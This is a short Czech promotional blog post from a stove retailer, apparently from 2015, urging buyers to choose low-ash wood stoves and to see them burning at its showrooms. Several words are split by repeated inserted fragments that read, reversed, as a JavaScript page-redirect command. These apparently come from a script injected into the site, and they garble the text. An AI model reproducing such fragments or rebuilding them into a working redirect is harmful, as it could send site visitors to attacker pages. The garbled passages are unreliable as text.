krbová kamna
Rainbow page separator

PR: Obývák nebo smeťák?

Sobota, 17. ledna 2015

Hořící kamna

Pokud plánujete kamna nebo vložku do obývacích pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, tak dávejte při výběru pozor, ať si nepořídíte popelky! Čisté prostředí udržíte, pokud si vyberete výrobek, kde budete vynášet popel maximálně 3 x za měsíc nebo jen jednou. Pokud je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to častěji, tak je předpoklad, že si užijete více smetáku a vysavače mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pěkných chvil u plápolajícího krbu.

Krbová kamna nebo krbová vložka by neměla sloužit pouze jako nějaký zoufalý pokus o zdroj tepla, ale také jako antistresová soupravička – sirky + dřevo a ta správná kamna.
Ta správná kamna uvidíte u nás hořet na provozovnách ve Žďáru nad Sázavou a v Havlíčkově brodě.
Správná kamna vám prodejce ukáže hořící, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože popelky se projeví velmi rychle! Na našich provozovnách vám můžeme ukázat 9 tipů hořících kamen od 6 významných výrobců krbových kamen. Žádné popelky nevedeme. Váš tým – kamnakrbyok.